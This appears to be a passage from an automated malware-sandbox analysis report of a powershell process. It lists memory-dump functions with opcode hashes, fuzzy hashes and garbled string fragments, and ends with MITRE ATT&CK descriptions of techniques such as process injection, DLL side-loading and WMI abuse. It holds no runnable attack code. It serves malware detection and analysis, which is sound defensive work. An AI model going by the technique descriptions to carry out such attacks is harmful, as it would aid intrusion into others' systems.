Instruction ID: 3a43a5b920386feb64fc79969ac74d377853279d5006135ef858f35f9fa806fe
Opcode Fuzzy Hash: 173735439281a5920b0bbc48cee52b5c7a7a20037c1643c86742a7bbab99bc20
Instruction Fuzzy Hash: 06511A39A102599FCB04DF98D484A9DFBF1FF49320F158199E815AB321C731ED45CB90

Function 00B8946F Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b59b54684bf966a5322161ca0f595c76ee6bff537976729f7ef5588f8d615603
Instruction ID: f064246745547d85618029e2294fe549630fe948fc39cd414d8f2dd052bd7a7d
Opcode Fuzzy Hash: b59b54684bf966a5322161ca0f595c76ee6bff537976729f7ef5588f8d615603
Instruction Fuzzy Hash: 4A412731A006149FDB18DB74C958EBEBBF6FF89751F184468E406AB7A0DB359C41CB50

Function 00B896C7 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f587bf15b9a1c4ca35ad5542daeb64a284663a6d62c07ffc77683aefb0eabe64
Instruction ID: 585780ecf580e18ebc4193455216092a79318e5a855e2e897e94e2b7a31b622f
Opcode Fuzzy Hash: f587bf15b9a1c4ca35ad5542daeb64a284663a6d62c07ffc77683aefb0eabe64
Instruction Fuzzy Hash: C4413A30A002189FDB18EFB9D945AADBBF6FF84340F148469D406AB7A4DB75AC45CF81

Function 06F73214 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ab6ba92813a5c28e057cd2751a11928ab30453f9f509ea34d4f9352a9003af
Instruction ID: d263bdebc817258a231890876538df20a0b76da0b0af948307176b78cbba3c84
Opcode Fuzzy Hash: 05ab6ba92813a5c28e057cd2751a11928ab30453f9f509ea34d4f9352a9003af
Instruction Fuzzy Hash: F031D371A0E3C17FD3968B648865B16BF619F82300F19C0DBE4948F1A3CA658C46C3A6

Function 00B83440 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0ebd182b0cb4b7c0d9ec8a81a4f544fc26aaedc5f0c235a3abb43da42a2846
Instruction ID: d14ed7f654ec57c8f239a12bb6e471422aece8fb7631da361e9b3b1a9eefabf0
Opcode Fuzzy Hash: dc0ebd182b0cb4b7c0d9ec8a81a4f544fc26aaedc5f0c235a3abb43da42a2846
Instruction Fuzzy Hash: 1C412674A005059FCB09CF58C198AEAFBF1FF48710B258699D845AB364C732EE91CBA0

Function 06F76BD6 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335781d59e84f8266837b012783bbf363289c1dd44eff74e0857e4e03f077a1d
Instruction ID: 819b8d013214126a3f2b9c034903ab5e9fcc2702939f3fa82a1e824b7e17ce40
Opcode Fuzzy Hash: 335781d59e84f8266837b012783bbf363289c1dd44eff74e0857e4e03f077a1d
Instruction Fuzzy Hash: 27317230B502149FD704AB68C956BAF7E67EF84744F20C415E901AF391CE7ADC468BE1

Function 00B83450 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adf1c9c7d1fd57250c9744a1071fe9aa1bfa3a5fca8f97c9cc7cc5f9419f543c
Instruction ID: 6bed7aaf4bca2a9ac06277347d488c799e676c31ee12fdee54809e63a852db78
Opcode Fuzzy Hash: adf1c9c7d1fd57250c9744a1071fe9aa1bfa3a5fca8f97c9cc7cc5f9419f543c
Instruction Fuzzy Hash: 4A411574A005059FCB09DF58C1989EAFBF1FF48710B258599D945AB364C732FE90CBA0

Function 06F70EE0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7a8f5cc46cdfa15935bfcae61a3f80711b998ae00d24c382a8e34825ef5119
Instruction ID: aa33709ab500dc84b5e133c5b8705366dc36c9c0202aaef77e3a82ec2b77bcc2
Opcode Fuzzy Hash: 5c7a8f5cc46cdfa15935bfcae61a3f80711b998ae00d24c382a8e34825ef5119
Instruction Fuzzy Hash: 00215A71B00304AFD7A456BE8855B7AB6C6DFC8711F24842BA546DB281CE75C841C3A8

Function 00B8C288 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c0e194802bad883df5972049ce7017b7e842ade48ba096d2c94c3f5733abac7
Instruction ID: 266bd2639125d4d487a9ed65b845797ec3e49228aef0a41061eacf9cb1491c49
Opcode Fuzzy Hash: 9c0e194802bad883df5972049ce7017b7e842ade48ba096d2c94c3f5733abac7
Instruction Fuzzy Hash: D7311B30A001288FCB15EB64C955AEEB7F2BF8A304F1140E9D509AB362CF359E81CF91

Function 00B83965 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7f1a82228e1bf42a7811d91fa632c0f5ec250107f83682e9f94c9d9db506e2
Instruction ID: c1ffbf94caa7c3839b6dc5b1f2148d695cffd2a3671b0b33d97cc84119c05aa1
Opcode Fuzzy Hash: ff7f1a82228e1bf42a7811d91fa632c0f5ec250107f83682e9f94c9d9db506e2
Instruction Fuzzy Hash: 10316F75A042458FCB05CF98C990AAABBF1FF49310B15419AD849EB762D335ED51CBA0

Function 06F70EC4 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca502daffdc20ae560a3eae0a379ae754eceed6d26af3440b124da923822cc0
Instruction ID: 487bb79a174f6373b6c6e53c1b00f8839eabecd892e1ac6620c3a47e0f52df46
Opcode Fuzzy Hash: aca502daffdc20ae560a3eae0a379ae754eceed6d26af3440b124da923822cc0
Instruction Fuzzy Hash: 26219B71B04344BBD7640A7E8851BB67B95DF85710F14842BE986DB2D1CE75CC40C3B8

Function 00B84678 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd7c9be23555b65c9d4521e615d3ce24bb17e31cb0e842cd5a03bf2c612e3b74
Instruction ID: bb57c5b829e3fbba52810d140a9cbb573819e9959ed4c3a91488ed517d5772e8
Opcode Fuzzy Hash: dd7c9be23555b65c9d4521e615d3ce24bb17e31cb0e842cd5a03bf2c612e3b74
Instruction Fuzzy Hash: DE211B78A002069FCB00DF58C5809AEFBF5FF49310B6585A5D809EB761C735EC51CBA0

Function 00B84688 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3275e81e1c86f1eae3476c831f727a7b63f16062d39440d392de41e6bf76202
Instruction ID: cc7f0da729fc0f136804998fa328707124b629b4a80761918ef347863c96f54e
Opcode Fuzzy Hash: b3275e81e1c86f1eae3476c831f727a7b63f16062d39440d392de41e6bf76202
Instruction Fuzzy Hash: CA211B78A0020A9FCB04DF98C5849AEFBF5FF49310B548599D949AB361C735EC51CBA0

Function 06F70CD0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479936616f15999d90965769fd8e6c354bf4bc99a4986c258d329ab1903fff41
Instruction ID: 8940c326d8c8ef5e731cbae1668e719608b0b2ba68378a7cd2d47d57022478ce
Opcode Fuzzy Hash: 479936616f15999d90965769fd8e6c354bf4bc99a4986c258d329ab1903fff41
Instruction Fuzzy Hash: D801F737B003199FC76459AAE400576BB9ADFC5222F14C43BD949CB251DE32E845C7A4

Function 00B8F3AB Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7bd1f89d8231280408093b4d36c5a91c035e28ea7695eae22d31ed11d2ee98
Instruction ID: 66481f18ccb53f43b2361e6dc5c9f0ae10b82bfb2307d15d3d0be7b73b163af9
Opcode Fuzzy Hash: 7d7bd1f89d8231280408093b4d36c5a91c035e28ea7695eae22d31ed11d2ee98
Instruction Fuzzy Hash: 2511C330C1414ACBDF24FA94D5897BDB7B1EB40329F1814BAD401B62A1EB745CCACB1A

Function 008CD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2429656684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133f56cf206f640aa7c0cbe3424ed064b956446f347d4b7c4708af6ae2542f57
Instruction ID: eab5854aa6ebb691bdd5f6142e9e0ad8612adab6e5960ff2c47a662c60cf959c
Opcode Fuzzy Hash: 133f56cf206f640aa7c0cbe3424ed064b956446f347d4b7c4708af6ae2542f57
Instruction Fuzzy Hash: E001A7714057449AD7209A1ECD84F67BFE8FF55324F18C53DED488A246C279D842C6B1

Function 00B82B63 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d1729df02088a45f305285d5edc936753abcffd86f211e0188b7e8a96be130c
Instruction ID: 6e974fc181f3660d5a48d61d795cd0254e831cd8f1176cd3d8cb0dd1a8665553
Opcode Fuzzy Hash: 4d1729df02088a45f305285d5edc936753abcffd86f211e0188b7e8a96be130c
Instruction Fuzzy Hash: E0012C78A402149FDB04DB98D491AA9F7B1FF8E310B248599D95A97361CA35EC07CB50

Function 008CD01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2429656684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43f10f6dce0aeee9b18374d895644466984756596da3c626cf77b2924e1f6f87
Instruction ID: 0f5e4e1d42aed4dd6c036c67d502b80591c35d6d1e00d63aed06c9fae78601f0
Opcode Fuzzy Hash: 43f10f6dce0aeee9b18374d895644466984756596da3c626cf77b2924e1f6f87
Instruction Fuzzy Hash: CBF0C271004344AEE7108A1ACC84B63FFE8EF56334F18C56EED484E686C2799840CAB1

Function 06F72FB4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b6763106264d70b916c77292aee97ff64e19a6f61dfe746d036c59cb430742
Instruction ID: 83582f05d48717b728b68b6165d1c0323f371f65a0e796f11c8940a9ff305399
Opcode Fuzzy Hash: f3b6763106264d70b916c77292aee97ff64e19a6f61dfe746d036c59cb430742
Instruction Fuzzy Hash: 80F03074E052819FD366CF14D854B52BBA1AF91318F19C4DFD4455F193D732D942D701

Non-executed Functions

Function 06F722F0 Relevance: 12.8, Strings: 10, Instructions: 307COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F72507
4']q, xrefs: 06F725D2
4']q, xrefs: 06F725C6
$]q, xrefs: 06F7255C
$]q, xrefs: 06F7256C
4']q, xrefs: 06F723E8
$]q, xrefs: 06F724E6
$]q, xrefs: 06F7259D
$]q, xrefs: 06F725A9
4']q, xrefs: 06F723F4

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-267665775
Opcode ID: 0af67c55bf6f44ece3bec55992a1bff723553a057caf096d5c45fc0ca298bba1
Instruction ID: e0cf65752c101c39b552cdcf2ecba804e9df74ba49c3260e7bd7e1ccd8614ace
Opcode Fuzzy Hash: 0af67c55bf6f44ece3bec55992a1bff723553a057caf096d5c45fc0ca298bba1
Instruction Fuzzy Hash: 2BA14332F043048FDBA85E3DA86166A7BE6EF85650F1484BBE845CB256DF31CB41C7A1

Function 06F740E8 Relevance: 10.5, Strings: 8, Instructions: 497COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F741B8
$]q, xrefs: 06F74363
$]q, xrefs: 06F7436F
4']q, xrefs: 06F741C4
$]q, xrefs: 06F7413F
$]q, xrefs: 06F7433B
$]q, xrefs: 06F74183
$]q, xrefs: 06F74177

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3118171705
Opcode ID: d58d20d5042f19c63559132340c2c069ecd1e9b1888b00cba9e4f072290dddd9
Instruction ID: af3c5047b598be554385489f2bcdff22e10f1f01cbe663909fb46c8c70dca1c4
Opcode Fuzzy Hash: d58d20d5042f19c63559132340c2c069ecd1e9b1888b00cba9e4f072290dddd9
Instruction Fuzzy Hash: 49F14532F043459FDBA99E6D988066ABBE6FFC5310F2484BBD849CB251DB31C851C7A1

Function 06F71C60 Relevance: 10.4, Strings: 8, Instructions: 395COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F71CFB
4']q, xrefs: 06F71D52
$]q, xrefs: 06F71CB7
4']q, xrefs: 06F71D5E
t~pq, xrefs: 06F71D7D
$]q, xrefs: 06F71CEF
4']q, xrefs: 06F72024
4']q, xrefs: 06F7202E

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$t~pq$$]q$$]q$$]q
API String ID: 0-462330472
Opcode ID: 934647a94f37df6ca22a448c3952e750e574526b2aa5af839e2b5b4cdf608aed
Instruction ID: b2b43c729969b85dbeeb7144844c658d41ea43b9a07fdb01b0706722604a2d11
Opcode Fuzzy Hash: 934647a94f37df6ca22a448c3952e750e574526b2aa5af839e2b5b4cdf608aed
Instruction Fuzzy Hash: C2C13431F002099FCBA4DFB988506AABBE6EFC5311F18847BD855DB241DB31D94AC7A1

Function 06F7CF00 Relevance: 8.9, Strings: 7, Instructions: 153COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F7CF7B
$]q, xrefs: 06F7D12C
4']q, xrefs: 06F7D15E
tP]q, xrefs: 06F7D06E
$]q, xrefs: 06F7CF9C
TQbq, xrefs: 06F7D102
TQbq, xrefs: 06F7CF5A

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$TQbq$TQbq$tP]q$$]q$$]q$$]q
API String ID: 0-2778409501
Opcode ID: 79e72b4e967669bd2dc03e95401a4cbec88bc9fafa3c167f9f878152e7f64c21
Instruction ID: 867bde76231055c3bb04fd3ff324b539874ca3b484d1a668d1140f9599e7391b
Opcode Fuzzy Hash: 79e72b4e967669bd2dc03e95401a4cbec88bc9fafa3c167f9f878152e7f64c21
Instruction Fuzzy Hash: 4151D431E00205DFEBA4CF18C544BA677F2BF84751F99906BE8059B294C772DD81CBA1

Function 06F7C9B8 Relevance: 7.7, Strings: 6, Instructions: 162COMMON

Download Yara Rule

Strings

d%cq, xrefs: 06F7CBE5
tP]q, xrefs: 06F7CBB1
4']q, xrefs: 06F7CC4F
d%cq, xrefs: 06F7CBDB
$]q, xrefs: 06F7CA98
d%cq, xrefs: 06F7CB77

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
API String ID: 0-3562389410
Opcode ID: 01bc6e4b354e62a7fd47d4b59bb9fc6b49603b3265c49a2383123461beb1ed48
Instruction ID: 8050fce14fdbc65a8a434c5766d0215f432ebbae13cec8d5d19dc980fd603662
Opcode Fuzzy Hash: 01bc6e4b354e62a7fd47d4b59bb9fc6b49603b3265c49a2383123461beb1ed48
Instruction Fuzzy Hash: 7D51E631E00354DFEB64CF58C594AAABBF2AF88751F19849BE8059B390C731DD41CBA1

Function 06F7D908 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

tP]q, xrefs: 06F7DAA2
$]q, xrefs: 06F7DB62
4']q, xrefs: 06F7DBDA
$]q, xrefs: 06F7D983
$]q, xrefs: 06F7D9A4

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$tP]q$$]q$$]q$$]q
API String ID: 0-2702571027
Opcode ID: d24a35d2afa498ef64b1fbb4897d5d372e08a8ffb1b56693189edf5f933077d0
Instruction ID: 723d8a1f3e88733598f4f9975b81197d2b94dde57d90d172a89c3cf6d9513f62
Opcode Fuzzy Hash: d24a35d2afa498ef64b1fbb4897d5d372e08a8ffb1b56693189edf5f933077d0
Instruction Fuzzy Hash: 3E61D131E04209DFEBA88E18C644BBA77B6BF84751F988467E8015B295C775ED80CBA1

Function 06F7CAFE Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

d%cq, xrefs: 06F7CBE5
tP]q, xrefs: 06F7CBB1
4']q, xrefs: 06F7CC4F
d%cq, xrefs: 06F7CBDB
d%cq, xrefs: 06F7CB77

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$d%cq$d%cq$d%cq$tP]q
API String ID: 0-1723543176
Opcode ID: cd9238a32922fce024165b093497dc606ab348ec79f47b44d287953c1ce28a7f
Instruction ID: f453be068772a9069c5960c4a928fbb30ef79570c22edcf450f18dc1a8384751
Opcode Fuzzy Hash: cd9238a32922fce024165b093497dc606ab348ec79f47b44d287953c1ce28a7f
Instruction Fuzzy Hash: FF319135F002149FDB64CF58C594A5ABBB6EB8CB11F25855AF905AB350C731EC01CB91

Function 06F7C268 Relevance: 5.5, Strings: 4, Instructions: 484COMMON

Download Yara Rule

Strings

(o]q, xrefs: 06F7C35E
(o]q, xrefs: 06F7C34E
(o]q, xrefs: 06F7C691
(o]q, xrefs: 06F7C6A1

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q
API String ID: 0-1261621458
Opcode ID: d8baad7f571defc4de84115f00fc0d9673bcd0b64be0296317cfd4db2f9ef019
Instruction ID: eb4650f59ea3fa2369a53ea2039a674de6503fe1ec0d24dd632fd6f529ca2f7c
Opcode Fuzzy Hash: d8baad7f571defc4de84115f00fc0d9673bcd0b64be0296317cfd4db2f9ef019
Instruction Fuzzy Hash: 94F13631F04308DFDBA59F68D844BAABBA2FF85310F14846BE915DB291DB36C941C7A1

Function 06F700F0 Relevance: 5.5, Strings: 4, Instructions: 463COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F701DD
tP]q, xrefs: 06F7051B
tP]q, xrefs: 06F70527
4']q, xrefs: 06F701D1

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q
API String ID: 0-3637193552
Opcode ID: 30007ffcccdaffbb8b2dea40dc2d84eb50d829da1cd4c5e982c19adba61d670a
Instruction ID: 7cb4247f3adaf5619d0d0bc9df3aa45a8dbf4de73e0cefae1e70a8c9ee71dec6
Opcode Fuzzy Hash: 30007ffcccdaffbb8b2dea40dc2d84eb50d829da1cd4c5e982c19adba61d670a
Instruction Fuzzy Hash: EEE156B2F04305CFCBA49B6C9855A6BBBE6EFC5310F28846BD945DB291DE31C841C7A1

Function 06F7E510 Relevance: 5.4, Strings: 4, Instructions: 398COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F7E965
4']q, xrefs: 06F7E5B0
4']q, xrefs: 06F7E959
4']q, xrefs: 06F7E5A4

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 1d20a3b433f898fe14d148c630a75e0734649f3e4e467fd9d739ba661dfcfb98
Instruction ID: 2fc27de29299f17579e7c9ef517e1a1029a9f212736d6fb508657184670bc997
Opcode Fuzzy Hash: 1d20a3b433f898fe14d148c630a75e0734649f3e4e467fd9d739ba661dfcfb98
Instruction Fuzzy Hash: ACD10131F04208DFCBA49B68C855A6ABBB6AFC9310F14C4ABD805DB355DB31DC46CBA1

Function 06F71AC0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F71B1C
$]q, xrefs: 06F71B28
$]q, xrefs: 06F71AD2
$]q, xrefs: 06F71AEE

Memory Dump Source

Source File: 00000005.00000002.2465953159.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f70000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: f7eec4277c3649bf370a6d58a7d955ff3a7cb25f5a9df87b535b2e8aefb04cab
Instruction ID: 4c04f380a66e72860cac16308464d725342a60dece84407dcc80a4c344af8a21
Opcode Fuzzy Hash: f7eec4277c3649bf370a6d58a7d955ff3a7cb25f5a9df87b535b2e8aefb04cab
Instruction Fuzzy Hash: F3212932B103055FE7A8957E4841B2776DA9BC4715F28842BD905C7381ED76D84DC3A1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

